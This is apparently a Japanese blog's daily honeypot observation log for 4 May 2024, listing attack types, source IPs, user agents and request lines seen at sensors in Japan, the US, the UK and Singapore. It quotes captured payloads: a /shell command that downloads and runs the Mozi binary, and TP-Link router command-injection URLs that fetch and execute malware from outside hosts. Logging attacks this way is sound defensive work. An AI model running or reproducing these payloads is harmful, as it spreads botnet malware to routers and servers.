コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/05/04 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2024/05/04分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

curlによるスキャン行為
WordPressへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス

を確認しました。

Location:UK

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
curlによるスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Odinによるスキャン行為
curlによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://125.26.180.114:49342/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:109 (前日比:-59)
US:総アクセス数:182 (前日比:57)
UK:総アクセス数:172 (前日比:-48)
SG:総アクセス数:142 (前日比:42)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.227.117.130 United States
4 5.8.11.202 Russia
1 20.62.192.73 United States
4 44.220.53.213 United States
1 45.56.108.128 United States
1 54.241.156.9 United States
1 65.49.20.66 United States
1 66.240.205.34 United States
13 68.183.85.218 United States
3 74.82.47.5 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
1 87.246.7.62 Bulgaria
12 101.32.192.203 Singapore
1 107.170.237.59 United States
1 120.57.88.120 India
1 122.96.28.49 China
4 135.125.246.110 France
7 135.125.246.189 France
29 141.98.10.29 Lithuania
1 167.94.138.121 United States
1 167.94.145.106 United States
1 167.248.133.46 United States
1 176.240.200.126 Turkey
1 185.185.43.50 United States
4 185.254.196.173 Ukraine
1 192.241.208.62 United States
1 192.241.208.69 United States
1 198.23.219.103 United States
1 198.199.92.46 United States
1 199.45.155.23 United States
2 205.210.31.8 United States
2 205.210.31.235 United States
1 209.141.40.117 United States

UserAgent一覧

件数 UserAgent
15 -
1 Mozilla/5.0 (Linux; Android 4.4.2; LG-V410 Build/KOT49I.V41010d) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.103 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0
1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
1 Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.94 Safari/537.36
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 curl/7.81.0
1 curl/8.1.2
4 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 \x16\x03\x01\x01H\x01
11 \x16\x03\x01
1 {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg\",\"pass\":\"x\"}}\n
20 GET /.env HTTP/1.1
6 GET /.git/config HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2021/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab9 HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /bundle.js HTTP/1.1
1 GET /cgi/conf.bin HTTP/1.1
2 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /feed/ HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /upl.php HTTP/1.1
2 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /webui/ HTTP/1.1
2 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-includes/ID3/license.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /xmlrpc.php?rsd HTTP/1.1
12 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 HEAD / HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.33.80.243 United States
1 45.61.128.206 United States
1 45.79.181.251 United States
2 54.36.115.221 France
1 64.62.156.68 United States
1 64.62.156.72 United States
1 64.62.156.79 United States
1 65.49.1.102 United States
1 66.175.213.4 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
46 80.94.92.60 Romania
2 83.97.73.245 Germany
2 84.54.51.41 Bulgaria
4 87.121.69.52 Bulgaria
1 89.190.156.225 United States
1 91.92.245.67 Bulgaria
1 91.92.250.127 Bulgaria
3 103.245.236.120 private ip address
1 104.131.144.29 United States
1 106.75.175.181 China
1 107.170.192.22 United States
1 139.59.101.104 Singapore
3 139.162.251.25 Netherlands
1 141.98.11.79 Lithuania
40 141.98.11.109 Lithuania
2 143.198.204.194 United States
2 157.230.37.129 United States
3 164.52.0.94 China
6 165.22.54.194 United States
2 167.71.197.10 United States
2 167.71.201.103 United States
4 167.71.201.139 United States
3 167.71.202.190 United States
2 167.94.138.115 United States
2 167.94.138.124 United States
2 167.94.145.108 United States
2 172.105.77.209 United States
1 172.105.128.11 United States
1 176.103.49.164 Ukraine
1 182.124.25.61 China
1 185.180.143.138 Portugal
1 185.224.128.17 Netherlands
1 192.155.90.220 United States
1 194.165.16.72 Panama
4 195.1.144.109 Norway
1 198.46.171.16 United States
1 198.199.104.82 United States
1 198.199.105.59 United States
2 199.45.154.24 United States
1 199.45.155.52 United States
2 205.210.31.184 United States
9 213.0.77.188 Spain

UserAgent一覧

件数 UserAgent
48 -
11 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
46 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
40 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0 zgrab/0.x
11 Mozilla/5.0
2 Root Slut

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_34.68.118.83_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
11 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x02
13 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 CONNECT example[.]com:80 HTTP/1.1
5 CONNECT google[.]com:443 HTTP/1.1
1 GET /.bash_history HTTP/1.0
1 GET /.env.prod HTTP/1.0
1 GET /.env_ci HTTP/1.0
6 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
1 GET /.environ HTTP/1.0
3 GET /.git/config HTTP/1.1
1 GET /.git2/config HTTP/1.1
1 GET /.history HTTP/1.0
1 GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /.ssh/known_hosts HTTP/1.0
20 GET /.svn/entries HTTP/1.1
1 GET /.zsh_history HTTP/1.0
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /AWSconf.git/config HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /api/.git/config HTTP/1.1
1 GET /app/.git/config HTTP/1.1
1 GET /application/.git/config HTTP/1.1
1 GET /assets../.git/config HTTP/1.1
1 GET /backup/.git/config HTTP/1.1
1 GET /beta/.git/config HTTP/1.1
1 GET /build/.git/config HTTP/1.1
11 GET /cdn-cgi/trace HTTP/1.1
1 GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94[.]156[.]79[.]193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
4 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http[:]//103[.]14[.]226[.]142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1
1 GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /cms/.git/config HTTP/1.1
1 GET /common/.git/config HTTP/1.1
1 GET /data/.git/config HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /git../.git/config HTTP/1.1
1 GET /help/.git/config HTTP/1.1
1 GET /images../.git/config HTTP/1.1
1 GET /img../.git/config HTTP/1.1
1 GET /js../.git/config HTTP/1.1
1 GET /lib../.git/config HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /media../.git/config HTTP/1.1
1 GET /static../.git/config HTTP/1.1
1 GET /wallet.dat HTTP/1.0
1 GET /webui/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
4 PRI * HTTP/2.0
46 PUT /SDK/webLanguage HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
3 31.215.66.65 United Arab Emirates
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
14 47.96.108.64 China
2 54.36.115.221 France
10 57.129.23.166 France
1 64.62.156.78 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 83.97.73.245 Germany
1 84.54.51.37 Bulgaria
2 84.54.51.41 Bulgaria
4 87.121.69.52 Bulgaria
1 87.246.7.62 Bulgaria
1 89.190.156.225 United States
1 91.92.255.41 Bulgaria
1 91.170.228.234 France
1 103.149.34.67 Indonesia
1 103.245.236.120 private ip address
1 104.131.144.8 United States
1 107.170.252.61 United States
38 124.222.50.239 China
1 139.59.101.104 Singapore
3 139.162.223.12 Netherlands
1 141.98.11.79 Lithuania
2 141.255.167.250 Panama
2 143.198.204.194 United States
6 148.153.56.86 United States
2 167.71.201.66 United States
2 167.94.146.53 United States
1 172.104.11.46 United States
1 172.105.77.209 United States
2 172.105.128.12 United States
22 178.79.139.171 United States
3 184.105.139.69 United States
1 185.180.140.4 Portugal
2 192.99.7.195 Canada
1 192.155.90.220 United States
1 192.241.200.25 United States
1 192.241.212.30 United States
2 195.1.144.107 Norway
3 195.1.144.109 Norway
1 198.199.101.72 United States
2 198.235.24.108 United States
2 205.210.31.34 United States
13 209.97.183.47 United States

UserAgent一覧

件数 UserAgent
88 -
11 Go-http-client/1.1
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
15 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/101.0.4951.41 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
6 Mozilla/5.0
4 Root Slut
15 curl/7.54.0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\x07\x01
7 \x16\x03\x01\x02
22 \x16\x03\x01
5 CONNECT google[.]com:443 HTTP/1.1
1 GET /.env.www HTTP/1.1
15 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1.php HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /BbVb HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /IGjc HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /aab9 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /bundle.js HTTP/1.1
5 GET /cdn-cgi/trace HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38[.]45[.]200[.]163%2Farm+%3B+chmod+777+arm%3B+.%2Farm+tplink%3B+rm+-rf+arm) HTTP/1.1
3 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94[.]156[.]79[.]193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
5 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http[:]//103[.]14[.]226[.]142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1
1 GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /cgi/conf.bin HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /ext-js/app/common/zld_product_spec.js HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /jquery-3.3.1.slim.min.js HTTP/1.1
1 GET /jquery-3.3.2.slim.min.js HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /nmaplowercheck1714686083 HTTP/1.1
1 GET /onF9 HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php HTTP/1.0
1 HEAD / HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.196.102.74 France
3 13.84.185.120 United States
1 20.2.136.201 United States
1 34.211.232.165 United States
1 38.68.48.26 United States
1 45.56.108.128 United States
1 45.79.181.223 United States
6 46.23.108.242 Azerbaijan
9 54.36.115.221 France
5 57.129.23.166 France
1 64.62.156.10 United States
1 64.62.156.16 United States
1 64.62.156.21 United States
1 64.62.156.78 United States
1 64.226.73.164 United States
2 64.226.73.203 United States
1 64.226.121.139 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 83.97.73.245 Germany
1 84.54.51.37 Bulgaria
2 84.54.51.41 Bulgaria
4 87.121.69.52 Bulgaria
1 88.169.106.38 France
1 89.190.156.225 United States
3 103.245.236.120 private ip address
1 107.170.192.33 United States
1 107.170.228.43 United States
1 117.213.92.56 India
1 125.26.180.114 Thailand
1 141.98.11.79 Lithuania
2 141.255.167.250 Panama
6 148.153.45.234 United States
1 157.230.19.125 United States
1 157.230.27.187 United States
2 157.230.37.129 United States
1 164.90.229.185 United States
2 165.22.54.194 United States
2 167.248.133.183 United States
1 172.104.11.4 United States
1 172.104.11.51 United States
1 172.105.77.209 United States
1 172.105.128.12 United States
1 176.240.200.126 Turkey
9 178.62.242.51 United States
3 178.79.140.215 United States
1 185.180.140.4 Portugal
1 185.180.143.8 Portugal
1 185.224.128.17 Netherlands
13 188.166.232.79 United States
1 192.155.90.118 United States
1 192.241.210.25 United States
1 192.241.218.21 United States
1 195.1.144.107 Norway
2 195.1.144.109 Norway
1 198.199.106.131 United States
2 198.235.24.11 United States
2 198.235.24.193 United States
4 207.154.227.60 United States
3 209.38.218.173 United States
13 209.97.183.47 United States
1 209.141.40.117 United States

UserAgent一覧

件数 UserAgent
50 -
18 Go-http-client/1.1
1 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
4 Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)
5 Mozilla/5.0 zgrab/0.x
4 Mozilla/5.0
2 Root Slut
1 curl/7.81.0
2 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01$\x01
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\x07\x01
23 \x16\x03\x01
